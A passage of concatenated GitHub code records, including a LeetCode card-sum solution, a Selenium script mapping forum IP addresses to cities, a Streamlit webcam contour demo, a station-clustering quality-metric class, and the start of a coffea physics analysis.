print(bucket[\"Name\"])\n","repo_name":"vladimirryzhikov/Project_DE_15_03_23","sub_path":"yahoo_data/test_local_buckets.py","file_name":"test_local_buckets.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38427436281","text":"\"\"\"\nhttps://leetcode-cn.com/problems/uOAnQW\n\n“力扣挑战赛”心算项目的挑战比赛中,要求选手从 N 张卡牌中选出 cnt 张卡牌,若这 cnt 张卡牌数字总和为偶数,则选手成绩“有效”且得分为 cnt 张卡牌数字总和。\n给定数组 cards 和 cnt,其中 cards[i] 表示第 i 张卡牌上的数字。 请帮参赛选手计算最大的有效得分。若不存在获取有效得分的卡牌方案,则返回 0。\n\n示例 1:\n\n 输入:cards = [1,2,8,9], cnt = 3\n\n 输出:18\n\n 解释:选择数字为 1、8、9 的这三张卡牌,此时可获得最大的有效得分 1+8+9=18。\n\n示例 2:\n\n 输入:cards = [3,3,1], cnt = 1\n\n 输出:0\n\n 解释:不存在获取有效得分的卡牌方案。\n\n提示:\n 1 <= cnt <= cards.length <= 10^5\n 1 <= cards[i] <= 1000\n\n\"\"\"\nfrom typing import List\n\nclass Solution:\n def maxmiumScore(self, cards: List[int], cnt: int) -> int:\n if cnt == 1: # 如果只选一张卡牌\n max_even = 0 # 初始化最大偶数\n for i in cards: # 遍历所有卡牌\n if i % 2 == 0 and i > max_even: # 如果是偶数而且大于之前的最大偶数:\n max_even = i # 更新最大偶数为 i\n return max_even\n \n cards.sort(reverse = True) # [9,8,2,1]\n score = sum(cards[:cnt]) # score 为最大的 cnt 数字之和\n \n if score % 2 != 0 and len(cards) - cnt >= 1:\n max_odd = -1\n max_even = -1\n for i in range(cnt-1,-1,-1): # 找到前cnt个数中最小的奇数和偶数\n if cards[i] % 2 == 0 and max_even == -1:\n max_even = cards[i]\n if cards[i] % 2 != 0 and max_odd == -1:\n max_odd = cards[i]\n if max_odd != -1 and max_even!=-1:\n break\n min_odd = -1\n min_even = -1\n for i in range(cnt,len(cards)): #找到前cnt个数之后最大的奇数和偶数\n if cards[i] % 2 == 0 and min_even == -1:\n min_even = cards[i]\n if cards[i] % 2 != 0 and min_odd == -1:\n min_odd = cards[i]\n if min_even!=-1 and min_odd!=-1:\n break\n if not(min_odd != -1 and max_even != -1) and not(max_odd != -1 and min_even != -1) :\n # 无法替换数使得和为偶数\n return 0\n if min_odd == -1 or max_even == -1 and not (max_odd == -1 or min_even == -1):\n #只能大偶数换小奇数\n return score - max_odd + min_even\n elif max_odd == -1 or min_even == -1 and not (min_odd == -1 or max_even == -1):\n #只能大奇数换小偶数\n return score - max_even + min_odd\n else:\n #都能换,要比较拿个更划算\n return score - max_even + min_odd if min_odd - max_even > min_even - max_odd else score - max_odd + min_even\n elif score % 2 == 0:\n return score\n else:\n return 0\n\nif __name__ == \"__main__\":\n cards = [1,2,8,9]\n cnt = 3\n sol = Solution()\n result = sol.maxmiumScore(cards, cnt)\n print(result)","repo_name":"jasonmayday/LeetCode","sub_path":"leetcode_cup/1_easy/LCP_40_心算挑战.py","file_name":"LCP_40_心算挑战.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"5760582002","text":"# Convert IP into city name\n# Base on the city name convert into North(1), Middel(2), South(3), East(4), and others(0) \nimport numpy as np\nimport pandas as pd\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager #For Mac OS users\nimport time\n\nfile_name = './3_5_content.json' # 1. 
Choose the file\nptt = pd.read_json(file_name)\nip_list = list(ptt['IP'])\n\nprint('The program starts...')\n\ncity_list = []\ncount = len(ip_list)\nstart = time.time()\ndriver = webdriver.Chrome(ChromeDriverManager().install()) #For Mac OS users\n#driver = webdriver.Chrome(executable_path=\"chromedriver.exe\") #For Windows users\ndriver.get('https://www.ez2o.com/App/Net/IP')\nfor ip_addr in ip_list:\n print(count,'...')\n count -= 1\n elem = driver.find_element_by_xpath(\"//input[@id='QueryIP']\").clear()\n elem = driver.find_element_by_xpath(\"//input[@id='QueryIP']\")\n elem.send_keys(ip_addr) # ex: 218.173.71.162\n elem = driver.find_element_by_xpath(\"//button[@class='btn btn-primary']\")\n elem.click()\n elem = driver.find_element_by_xpath(\"//tbody/tr[@class='active'][3]/td[2]\")\n city_list.append(elem.text)\ndriver.close()\nend = time.time()\n\nminute = round((end - start)/60)\nsecond = round((end - start)%60)\n\nptt['City'] = city_list\nwith open('3_5_content.json', 'w', encoding='utf-8') as file: # 2. Change the name for the output file\n ptt.to_json(file, force_ascii=False, orient='records')\nprint('Finished')\nprint('Total time:',minute,'m',second,'s')","repo_name":"BrosCoffee/ptt_project","sub_path":"IP_to_Location5.py","file_name":"IP_to_Location5.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27811141424","text":"import cv2\nimport numpy as np\nimport streamlit as st\n\nfrom utils import encontrar_contornos, ordenar_pontos\n\nst.title('POCRS')\nrun = st.checkbox('Run')\nFRAME_WINDOW = st.image([])\ncam = cv2.VideoCapture(0)\nmodo = st.radio('Exibir', ('Normal', 'Cinza', 'Borrado', 'Bordas', 'Maior Contorno', 'Rotacioar imagem'))\n\nwhile run:\n ret, frame = cam.read()\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n (H, W) = img.shape[:2]\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(blur, 60, 160)\n conts, maior = encontrar_contornos(edged)\n if modo == 'Cinza':\n img = gray\n elif modo == 'Borrado':\n img = blur\n elif modo == 'Bordas':\n img = edged\n elif modo == 'Maior Contorno' and maior is not None:\n cv2.drawContours(img, maior, -1, (120, 255, 0), 28)\n cv2.drawContours(img, [maior], -1, (120, 255, 0), 2)\n elif modo == 'Rotacioar imagem' and maior is not None:\n pontos_maior = ordenar_pontos(maior)\n pts1 = np.float32(pontos_maior)\n pts2 = np.float32([[0, 0], [W, 0], [W, H], [0, H]])\n matriz = cv2.getPerspectiveTransform(pts1, pts2)\n img = cv2.warpPerspective(img, matriz, (W, H))\n FRAME_WINDOW.image(img)\nif not run:\n st.write('Parado')\n","repo_name":"LPicinin/POCRS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5328027281","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n'''\n CLASS for community detection in graphs, both spatial and temporal, functions necessary for the station-fault analysis\n'''\n\nclass cluster_quality_metric():\n\n def __init__(self):\n\n self._l_reg_methods = ['Absolute','Average','minPoints','None']\n\n self._max_distance=30.0\n self._minimum_samples=3\n self._algorithm=None\n self._metric=None\n self._cluster_method=None\n self._seed=None\n#d self._force_minPts = True # force to remove subgraphs with < minPts\n self._force_regularity='minPoints' # force Absolute, Average, or None regularity\n 
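The Streamlit demo above rectifies the largest contour with a four-point perspective transform; a minimal sketch of that step on a synthetic frame, with assumed corner coordinates.

import cv2
import numpy as np

frame = np.zeros((200, 300, 3), dtype=np.uint8)                  # stand-in frame
src = np.float32([[30, 20], [270, 40], [260, 180], [40, 170]])   # ordered corners
dst = np.float32([[0, 0], [300, 0], [300, 200], [0, 200]])
matrix = cv2.getPerspectiveTransform(src, dst)
warped = cv2.warpPerspective(frame, matrix, (300, 200))          # flattened view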
self._reg_tol_scaler=0.99 # multiply the regularity by the scaler to reduce the threshold\n\n pass\n\n def set_quality_frame(self, clustering_name: str=\"greedy_modularity_communities\",\n **metric_params: dict):\n\n import traceback\n import numpy as np\n\n self._max_distance=None\n self._minimum_samples=None\n self._algorithm=None\n self._metric=None\n self._cluster_method=None\n self._seed=None\n\n self._name=clustering_name\n try:\n ''' Set the default paramters for the specific clustering method '''\n if 'distance_km' in metric_params:\n if isinstance(metric_params[\"distance_km\"],float) and metric_params[\"distance_km\"] > 0:\n self._max_distance=metric_params[\"distance_km\"]\n else:\n raise ValueError('distance_km %s must be a float > 0.'\n % str(metric_params[\"distance_km\"]))\n\n if 'minimum_samples' in metric_params:\n if isinstance(metric_params[\"minimum_samples\"],(int, np.integer)) and metric_params[\"minimum_samples\"] > 0:\n# if metric_params[\"minimum_samples\"] > 0:\n self._minimum_samples=int(metric_params[\"minimum_samples\"])\n else:\n raise ValueError('minimum_samples %s must be an int > 0.'\n % str(metric_params[\"minimum_samples\"]))\n\n if 'algorithm' in metric_params:\n if isinstance(metric_params[\"algorithm\"],str):\n self._algorithm=metric_params[\"algorithm\"]\n else:\n raise ValueError('algorithm %s is invalid.' % (metric_params[\"algorithm\"]))\n\n if 'metric' in metric_params:\n if isinstance(metric_params[\"metric\"], str):\n self._metric=metric_params[\"metric\"]\n else:\n raise ValueError('metric %s is invalid.' % (metric_params[\"metric\"]))\n\n if 'cluster_method' in metric_params:\n if isinstance(metric_params[\"cluster_method\"], str):\n self._cluster_method=metric_params[\"cluster_method\"]\n else:\n raise ValueError('cluster_method %s is invalid.' 
% (metric_params[\"cluster_method\"]))\n\n if 'seed' in metric_params:\n if metric_params[\"seed\"] is np.random:\n self._seed=\"random\"\n elif metric_params[\"seed\"] is int:\n self._seed=\"integer\"\n else:\n self._seed=None\n\n except Exception as err:\n print(\"Class cluster_quality_metric [set_quality_frame] Error message:\", err)\n print(traceback.format_exc())\n\n return self\n\n\n def get_seq_params(self, _iter_combos_df, _n_exp_seq: int = 0):\n\n#d import pandas as pd # holds the clustering sequence parameters\n import numpy as np # necessary when using seed = np.random\n import traceback\n\n '''\n Set clustering parameters to execute cloud or graph clustering technique\n\n TODO: use below dictionaries to look up and validate valuses\n (python dictionary key look up not working)\n\n _dict_algorithms = {\"DBSCAN\": [\"auto\", \"ball_tree\", \"kd_tree\", \"brute\"],\n 'HDBSCAN': [\"best\",\"generic\",\"prims_kdtree\",\"prims_balltree\",\"boruvka_kdtree\",\n \"boruvka_balltree\"]}\n _dict_clust_method = {\"HDBSCAN\": [\"leaf\",\"eom\"],\"OPTICS\": [\"xi\",\"dbscan\"]}\n _dict_algorithms = {\"DBSCAN\": [\"auto\", \"ball_tree\", \"kd_tree\", \"brute\"],\n \"HDBSCAN\": \"best\",\"generic\",\"prims_kdtree\",\"prims_balltree\",\n \"boruvka_kdtree\",\"boruvka_balltree\",\n \"OPTICS\": ['auto', 'ball_tree', 'kd_tree', 'brute']\n }\n\n TODO: acquire the lists and dictionaries from the respective cloud and graph clustering classes\n '''\n\n _l_cluster_techniques = ['cloud','graph']\n _l_cloud_cluster_name = ['DBSCAN','HDBSCAN','AFFINITYPROPAGATION','OPTICS','MEANSHIFT',\n 'AGGLOMERATIVE','BIRCH','KMEANS','KNN','DENCLUE',\"SPECTRAL\"]\n _l_graph_cluster_name = [\"GREEDY\",\"NAIVE-GREEDY\",\"LPC\",\"ASYNC-LPA\",\n \"LUKES\",\"ASYNC-FLUID\",\"GIRVAN-NEWMAN\"]\n _dict_algorithms = {\"auto\", \"ball_tree\", \"kd_tree\", \"brute\",\n \"best\",\"generic\",\"prims_kdtree\",\"prims_balltree\",\"boruvka_kdtree\",\"boruvka_balltree\",\n \"kmeans\",\"discretize\"}\n\n _dict_clust_method = {\"leaf\",\"eom\",\"xi\",\"dbscan\",\"arpack\", \"lobpcg\", \"amg\"}\n '''In all instances when possible will be the choice; else it will be '''\n _lst_metric = [\"haversine\",\"euclidean\",\"manhattan\",\"minkowski\",\"precomputed\",\n \"precomputed_nearest_neighbors\",\"nearest_neighbors\",\"rbf\"]\n\n _dict_clust_params = {}\n\n i=_n_exp_seq\n try:\n# ''' Load data from CSV '''\n# _iter_combos_df = pd.read_csv(\"../experiments/cluster_runs.csv\")\n\n ''' Clustering method name is mandatory'''\n if _iter_combos_df.loc[i, 'name'] not in _l_cloud_cluster_name+_l_graph_cluster_name:\n raise AttributeError('%s is not a valid clustering method use \\n%s'\n % (_iter_combos_df.loc[i, 'name'],\n _l_cloud_cluster_name+_l_graph_cluster_name))\n else:\n _s_cloud_clust_name = str(_iter_combos_df.loc[i, 'name'])\n\n ''' Technique - assign the appropriate value based on the clustering name '''\n if _iter_combos_df.loc[i, 'technique'] not in _l_cluster_techniques:\n if _s_cloud_clust_name in _l_cloud_cluster_name:\n _cluster_technique = \"cloud\"\n elif _s_cloud_clust_name in _l_graph_cluster_name:\n _cluster_technique = \"graph\"\n else:\n _cluster_technique = str(_iter_combos_df.loc[i, 'technique'])\n\n ''' Create clustering input parameter Dictionary\n Maximum distance between points and the minimum points are undefined assign defaults '''\n if _iter_combos_df.loc[i, 'maxDistance'].astype(float) <= 1:\n print('maxDistance (Km) must ba a float >= 1.0; proceeding with default maxDistance=30.0 Km')\n 
_dict_clust_params[\"distance_km\"] = 30.0\n else:\n# _dict_clust_params[\"distance_km\"] = _iter_combos_df.loc[i, 'maxDistance'].astype(float)\n _dict_clust_params[\"distance_km\"] = float(_iter_combos_df.loc[i, 'maxDistance'])\n\n if _iter_combos_df.loc[i, 'minPts'].astype(int) <= 0:\n print('minPts must be an integer > 0; proceeding with default minPts=3')\n _n_min_cloud_clust_size = 3\n else:\n _dict_clust_params[\"minimum_samples\"] = _iter_combos_df.loc[i, 'minPts'].astype(int)\n# _dict_clust_params[\"minimum_samples\"] = int(_iter_combos_df.loc[i, 'minPts'])\n\n ''' Validate and assign algorithim based on the clustering name'''\n if _iter_combos_df.loc[i, 'algorithm'] in _dict_algorithms:\n _dict_clust_params[\"algorithm\"] = str(_iter_combos_df.loc[i, 'algorithm'])\n\n ''' Validate and assign clustering_method based on the clustering name'''\n if _iter_combos_df.loc[i, 'method'] in _dict_clust_method:\n _dict_clust_params[\"cluster_method\"] = str(_iter_combos_df.loc[i, 'method'])\n\n if _iter_combos_df.loc[i, 'metric'] in _lst_metric:\n _dict_clust_params[\"metric\"] = str(_iter_combos_df.loc[i, 'metric'])\n\n if isinstance(_iter_combos_df.loc[i, 'weight'],str):\n _dict_clust_params[\"weight\"] = str(_iter_combos_df.loc[i, 'weight'])\n\n if isinstance(_iter_combos_df.loc[i, 'seed'], str):\n if _iter_combos_df.loc[i, 'seed'] == \"random\":\n self._seed = \"random\"\n _dict_clust_params[\"seed\"] = np.random\n elif _iter_combos_df.loc[i, 'seed'] == \"int\":\n self._seed = \"int\"\n _dict_clust_params[\"seed\"] = int\n else:\n pass\n\n# if _iter_combos_df.loc[i, 'maxIter'] and _iter_combos_df.loc[i, 'maxIter'] > 0:\n if _iter_combos_df.loc[i, 'maxIter'].astype(int) > 0:\n _dict_clust_params[\"max_iter\"] = int(_iter_combos_df.loc[i, 'maxIter'])\n\n if _iter_combos_df.loc[i, 'randomState'].astype(int) > 0:\n _dict_clust_params[\"random_state\"] = int(_iter_combos_df.loc[i, 'randomState'])\n\n if _iter_combos_df.loc[i, 'numClusters'] > 0:\n _dict_clust_params[\"n_clusters\"] = int(_iter_combos_df.loc[i, 'numClusters'])\n\n# print('Preparing for %s clustering %s with parameters\\n%s'\n# % (_cluster_technique,_s_cloud_clust_name,_dict_clust_params))\n\n except Exception as err:\n print(\"Class cluster_quality_metric [get_seq_params] Error message:\", err)\n print(traceback.format_exc())\n\n return _cluster_technique,_s_cloud_clust_name,_dict_clust_params\n\n ''' Run the cloud or graph clustering sequence for the specific clustering method and parameters '''\n def get_clusters(self,\n _dict_clust_params,\n station_df,\n _cluster_technique: str=\"cloud\",\n _s_cloud_clust_name: str=\"DBSCAN\"):\n\n import cloud_clustering as cc\n import graph_clustering as gc\n import numpy as np\n import networkx as nx\n\n import traceback\n\n# __st_clust_df = station_df.copy()\n arr_st_coords = station_df[['st_lat','st_lon']].to_numpy()\n\n try:\n if _cluster_technique == 'cloud':\n cls_clust = cc.cluster_data(_s_cloud_clust_name,**_dict_clust_params)\n labels, labels_true, clust_centers = cls_clust.get_clusters(arr_st_coords)\n\n if arr_st_coords.shape[0] != labels.shape[0]:\n raise ValueError('Mismatch in station coordinate and labels array sizes to; cannot proceed')\n\n station_df['label'] = labels\n\n elif _cluster_technique == 'graph':\n cls_g_clust = gc.community_detection()\n params = cls_g_clust.set_community_detection_params(_s_cloud_clust_name,**_dict_clust_params)\n\n ''' G_cluster required to distinguish between communities and valid clusters '''\n G_simple, G_clusters = 
cls_g_clust.get_communities(station_df)\n station_df['label'] = nx.get_node_attributes(G_simple,'label').values()\n\n else:\n raise ValueError('Invalid clustering technique: %s' % _cluster_technique)\n\n ''' Force Regularity of flag is set'''\n\n except Exception as err:\n print(\"Class cluster_quality_metric [get_clusters] Error message:\", err)\n print(traceback.format_exc())\n\n return station_df\n\n ''' Get all quality measures and other parameters for the dataframe with appropriate cluster labels '''\n def get_quality_metrics(self, station_df,lst_graphs):\n\n import dunn as di\n from sklearn import metrics\n import networkx as nx\n import networkx.algorithms.community as nx_comm\n import numpy as np\n import pandas as pd\n import traceback\n\n quality_metric_df = pd.DataFrame([])\n\n try:\n#d _n_num_clust = len(station_df['label'].unique()) # Generated Cluster Count\n _n_num_clust = len([x for x in station_df['label'].unique() if x > -1]) # Generated Cluster Count\n if _n_num_clust <= 1:\n raise ValueError('Cannot compute quality metric for %d clusters' % (_n_num_clust))\n\n ''' returns the simple graph of the clusters and the set dictionary of cluster nodes '''\n G_simple_, l_G_clusters_ = self.__get_graph_n_labels(station_df)\n\n _s_st_types = str(station_df['st_type'].unique()) # Station Types\n _n_tot_num_st = station_df.shape[0] # Station Quantity\n _f_min_dist = self._max_distance # Minimum Distance\n _n_min_pts = self._minimum_samples # Minimum Points\n _s_clust = str(self._name) # Clustering Name\n _s_algo = str(self._algorithm) # Algorithm\n _s_metric = str(self._metric) # Metric\n _s_method = str(self._cluster_method) # Method\n _s_seed = str(self._seed) # Seed\n __lst_valid_cloud_clust = [frozenset(clust) for clust in l_G_clusters_\n if len(clust) >= self._minimum_samples]\n _n_valid_clust = len(__lst_valid_cloud_clust) # Valid Cluster Count\n\n # Clustered Station Count\n _n_sts_in_clusters=0\n for x in __lst_valid_cloud_clust:\n _n_sts_in_clusters += len(x)\n\n _n_noise = station_df.shape[0] - _n_sts_in_clusters # Unclsutered Noise Count\n _n_avg_deg = sum([d for n, d in G_simple_.degree()\n if G_simple_.nodes[n][\"label\"] > -1])/_n_sts_in_clusters # Average Node Degree\n\n ''' Compute the accuracy of r-regularity constraint on the individual clusters by considering the\n systematic error that is a reproducible inaccuracy consistent for the same clustering strategy.\n For such we apply the weighted mean absolute error to estimate the deviation from the expected degree.\n '''\n sum_deg_abs_err=0\n _deg_wmae=0\n _deg_err_st_count=0\n#p print(\"\\nclusters:\",len(lst_graphs))\n for H in lst_graphs:\n H = nx.Graph(H)\n H.remove_nodes_from(list(nx.isolates(H)))\n H.remove_nodes_from([n for n,v in H.nodes(data=True) if v[\"label\"]==-1])\n H_deg_abs_err=0\n _l_deg_diff=[]\n if H.number_of_nodes() > 0:\n _l_deg_diff = [_n_min_pts-1-d for n, d in H.degree()\n if (int(d) < int(_n_min_pts-1) and H.nodes[n][\"label\"] > -1)]\n if len(_l_deg_diff) > 0:\n#p print(\"\\ndegree mean absolute error\")\n#p print(\"minPts:\",_n_min_pts)\n#p print(\"list deg diff:\",_l_deg_diff)\n#p print(\"graph nodes:\",sorted([d for n,d in H.degree()]))\n sum_deg_abs_err += sum(_l_deg_diff)\n _deg_err_st_count += len(_l_deg_diff)\n if _deg_err_st_count > 0:\n _deg_wmae = sum_deg_abs_err/(_deg_err_st_count*(_n_min_pts-1))\n#p print(\"_deg_wmae\", _deg_wmae,_deg_err_st_count)\n\n ''' prepare valid stations for measuring the quality'''\n lst_st = list(nx.get_node_attributes(G_simple_,'pos').values())\n 
lst_lbl = list(nx.get_node_attributes(G_simple_,'label').values())\n\n _f_silhouette = metrics.silhouette_score(lst_st, lst_lbl,\n metric='haversine') # Silhouette Coefficient\n _f_cal_har = metrics.calinski_harabasz_score(lst_st, lst_lbl) # Calinski Harabaz score\n _f_dav_bould = metrics.davies_bouldin_score(lst_st, lst_lbl) # Davies Bouldin score\n _f_dunn = di.dunn_fast(lst_st, lst_lbl) # Dunn Index\n _f_modul = nx_comm.modularity(G_simple_,l_G_clusters_) # Modularity\n\n try:\n l_conductance = list(nx.conductance(G_simple_, cluster_i, weight='distance')\n for cluster_i in __lst_valid_cloud_clust)\n _f_conduct = sum(l_conductance)/len(l_conductance) # Conductance Average\n except Exception:\n _f_conduct = 0\n _f_cover = nx_comm.coverage(G_simple_, l_G_clusters_) # Coverage Score\n _f_perform = nx_comm.performance(G_simple_, l_G_clusters_) # Performance Score\n\n dict_quality_mesrs = {\n 'Station Types': _s_st_types,\n 'Station Quantity': _n_tot_num_st,\n 'Maximum Distance': _f_min_dist,\n 'Minimum Points': _n_min_pts,\n 'Name': _s_clust,\n 'Algorithm': _s_algo,\n 'Metric': _s_metric,\n 'Method': _s_method,\n 'Seed': _s_seed,\n 'Generated Cluster Count': _n_num_clust,\n 'Valid Cluster Count': _n_valid_clust,\n 'Clustered Station Count': _n_sts_in_clusters,\n 'Unclsutered Noise Count': _n_noise,\n 'Average Station Degree': _n_avg_deg,\n 'Degree Weighted Mean Absolute Error': _deg_wmae,\n 'Degree Error Station Count': _deg_err_st_count,\n 'Silhouette Coefficient': _f_silhouette,\n 'Calinski Harabaz score': _f_cal_har,\n 'Davies Bouldin score': _f_dav_bould,\n 'Dunn Index': _f_dunn,\n 'Modularity': _f_modul,\n 'Conductance Average': _f_conduct,\n 'Coverage Score': _f_cover,\n 'Performance Score': _f_perform,\n }\n# print('Dict qual',dict_quality_mesrs('Seed'))\n quality_metric_df = pd.DataFrame(dict_quality_mesrs, index=[_s_clust])\n quality_metric_df.reset_index(drop=True, inplace=True)\n\n except Exception as err:\n print(\"Class cluster_quality_metric [get_quality_metrics] Error message:\", err)\n# print(G_simple_.edges('distance'))\n print(traceback.format_exc())\n\n return quality_metric_df\n\n\n def __get_graph_n_labels(self, station_df):\n\n import sys; sys.path.insert(1, '../lib')\n import graph_clustering as gc\n import networkx as nx\n# import networkx.algorithms.community as nx_comm\n\n dict_feature_params = {\"distance_km\":self._max_distance,\n \"minimum_samples\":self._minimum_samples}\n\n cls_g_clust = gc.community_detection(**dict_feature_params)\n G_simple_ = cls_g_clust.get_simple_graph(station_df)\n #print(cloud_G_simple.nodes(data=True))\n\n _cloud_unique_labels = set(nx.get_node_attributes(G_simple_,'label').values())\n\n _l_cloud_g_cluster =[]\n for label in _cloud_unique_labels:\n selected_nodes = sorted([n for n,v in G_simple_.nodes(data=True) if v['label'] == label])\n if len(selected_nodes) > 0 and label != -1:\n _l_cloud_g_cluster.append(set(selected_nodes))\n elif len(selected_nodes) > 0 and label == -1:\n for st_node in selected_nodes:\n _l_cloud_g_cluster.append(set([st_node]))\n\n return G_simple_, _l_cloud_g_cluster\n\n ''' get_r_regular_clusters furhter removes those stations and clusters that do not comply with\n minPts and maxDist constraints\n '''\n def get_r_regular_clusters(self,_dict_reg_param,__st_clust_df):\n\n import sys; sys.path.insert(1, './lib')\n import pandas as pd\n import graph_clustering as gc\n import networkx as nx\n\n import traceback\n\n ''' Create subgraphs that comply with r-regularity where r >= minPts-1\n Given that the regularity 
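A toy illustration of the internal-validity scores gathered above, assuming scikit-learn: silhouette lies in [-1, 1] with higher meaning tighter, better-separated clusters, while Davies-Bouldin is lower-is-better.

import numpy as np
from sklearn import metrics

pts = np.array([[0.0, 0.0], [0.1, 0.0], [5.0, 5.0], [5.1, 5.2]])
labels = [0, 0, 1, 1]
print(metrics.silhouette_score(pts, labels))      # close to 1 for these points
print(metrics.davies_bouldin_score(pts, labels))  # small value here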
is based on the average degree, change the scaling value 0.95\n to one that is desired and in the interval (0,1] to set a regularity threshold @_f_reg_thresh\n '''\n try:\n ''' Set the default paramters for the specific r-regularity method '''\n if 'force_regularity' in _dict_reg_param:\n if _dict_reg_param[\"force_regularity\"] in self._l_reg_methods:\n self._force_regularity=_dict_reg_param[\"force_regularity\"]\n else:\n raise ValueError('force_regularity must be {%s}'\n % str(self._l_reg_methods))\n\n if 'regularity_threshold' in _dict_reg_param:\n if isinstance(_dict_reg_param[\"tolerance_scaler\"],float) and _dict_reg_param[\"tolerance_scaler\"] < 1.0:\n self._reg_tol_scaler = _dict_reg_param[\"tolerance_scaler\"]\n else:\n raise ValueError('regularity_threshold must be %s in invalid and must be in the interval [0,1]'\n % str(_dict_reg_param[\"tolerance_scaler\"]))\n#d else:\n#d print('Unspecified regularity_threshold; using default value %0.2f' % (self._reg_tol_scaler))\n\n ''' (n-1)-simplicies equalant to the regularity required to ensure all target-site stations\n have the minimum required target station connections '''\n _f_reg_thresh = self._reg_tol_scaler*(self._minimum_samples - 1)\n\n lst_G_simple = []\n ''' Only plot valid clusters '''\n no_noise_df = __st_clust_df[__st_clust_df['label']!= -1]\n# print('%d clusters after removing the noise clusters; i.e. label = -1'\n# % len(no_noise_df['label'].unique()))\n\n dict_feature_params = {\"distance_km\": self._max_distance,\n \"minimum_samples\": self._minimum_samples}\n#p print(\"Regularity processing maxDist < %0.2f and minPts > %d\"\n#p % (dict_feature_params[\"distance_km\"],\n#p dict_feature_params[\"minimum_samples\"]-1))\n cls_g_clust = gc.community_detection(**dict_feature_params)\n G_simple = cls_g_clust.get_simple_graph(no_noise_df)\n G_simple.remove_nodes_from(list(nx.isolates(G_simple)))\n if not nx.is_empty(G_simple):\n lst_G_simple = cls_g_clust.get_list_subgraphs(G_simple)\n#p print('\\n%d simple subgraphs created after removing clusters with isolated nodes' % len(lst_G_simple))\n\n ''' remove any graphs with zero average degree '''\n incomplete = True #flag to start stop while loop\n while incomplete and self._force_regularity != \"None\":\n incomplete = False\n ''' As a precaution first remove all subgraphs with zero degree nodes; i.e. 
singletons '''\n for G_idx, G in enumerate(lst_G_simple):\n if len(G.edges()) == 0:\n lst_G_simple.pop(G_idx)\n#p print('...removed subgraph %d with zero degree' % G_idx)\n incomplete = True\n\n for G_idx, G in enumerate(lst_G_simple):\n#p print(\"\\nGraph degree:\",G.degree())\n\n ''' Average regularity function '''\n degree_sequence = sorted([d for n, d in G.degree()], reverse=True)\n _avg_degree = sum(degree_sequence)/len(degree_sequence)\n if self._force_regularity == 'Average' and _avg_degree <= _f_reg_thresh:\n ''' try to pop if G_idx fails pass and will catch in the next round '''\n try:\n lst_G_simple.pop(G_idx)\n#p print('...removed subgraph %d with average degree %0.02f <= %0.02f tolerated degree'\n#p % (G_idx, _avg_degree,_f_reg_thresh))\n incomplete = True\n except Exception as err:\n pass\n\n elif self._force_regularity == 'Absolute':\n ''' Absolute regularity function forces strict minimal regularity '''\n H = nx.Graph(G)\n# remove = [n for n,d in dict(H.degree()).items()\n# if int(d) < int(self._minimum_samples-1)]\n remove = [n for n,d in H.degree()\n if int(d) < int(self._minimum_samples)]\n if len(remove) > 0:\n#p print('...removing nodes %s with degree < %d' % (remove, int(self._minimum_samples-1)))\n H.remove_nodes_from(remove)\n if H.number_of_nodes() > 0:\n lst_G_simple.pop(G_idx)\n lst_G_simple.append(H)\n#p print('...replaced subgraph %d with reduced nodes=%d'\n#p % (G_idx, H.number_of_nodes()))\n else:\n#p print('...removing subgraph %d with %d nodes after node removal'\n#p % (G_idx, H.number_of_nodes()))\n lst_G_simple.pop(G_idx)\n incomplete = True\n elif self._force_regularity == 'minPoints':\n ''' minPoints function remove clusters with size < minimum_samples '''\n if G.number_of_nodes() < self._minimum_samples:\n lst_G_simple.pop(G_idx)\n\n ''' Modify the station dataframe to reflect the new noise and cluster labels '''\n new_st_clust_df_ = __st_clust_df.copy()\n\n if self._force_regularity != \"None\":\n new_st_clust_df_[\"label\"] = -1\n if len(lst_G_simple) > 0:\n for G_idx, G in enumerate(lst_G_simple):\n# print(self._minimum_samples)\n# print(\"reg fn\",[d for n,d in G.degree()])\n _nodes = sorted([n for n,v in G.nodes(data=True)])\n new_st_clust_df_.loc[new_st_clust_df_[\"st_name\"].isin(_nodes),\"label\"] = G_idx\n\n except Exception as err:\n print(\"Class cluster_quality_metric [get_r_regular_clusters] Error message:\", err)\n print(traceback.format_exc())\n\n return new_st_clust_df_, lst_G_simple\n","repo_name":"waidyanatha/quasar","sub_path":"lib/cluster_quality.py","file_name":"cluster_quality.py","file_ext":"py","file_size_in_byte":27068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"37905377186","text":"#!/usr/bin/env python\nimport numpy as np\nimport coffea.processor as processor\n\nfrom coffea import hist\nfrom coffea.analysis_objects import JaggedCandidateArray\n\n\ndef setup_candidates(df):\n \"\"\"Set up Physics candidates.\n\n Args:\n df ([type]): The dataframe containing the TTree data (must be flattened!)\n \"\"\"\n jets = JaggedCandidateArray.candidatesfromcounts(\n df[\"nHLTJets\"],\n pt=df[\"HLTJets_pt\"],\n eta=df[\"HLTJets_eta\"],\n phi=df[\"HLTJets_phi\"],\n mass=df[\"HLTJets_phi\"] * 0.,\n abseta=np.abs(df[\"HLTJets_eta\"]),\n sieie=df[\"HLTJets_sigmaEtaEta\"],\n sipip=df[\"HLTJets_sigmaPhiPhi\"],\n cssize=df[\"HLTJets_centralEtaStripSize\"],\n adssize=df[\"HLTJets_adjacentEtaStripsSize\"]\n )\n\n muons = JaggedCandidateArray.candidatesfromcounts(\n 
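The 'Absolute' pass above, which repeatedly drops nodes whose degree falls below the minimum, closely resembles a k-core reduction, and networkx ships that directly; a sketch:

import networkx as nx

G = nx.Graph([(1, 2), (2, 3), (3, 1), (3, 4)])   # node 4 has degree 1
core = nx.k_core(G, k=2)                         # iteratively strips degree < 2
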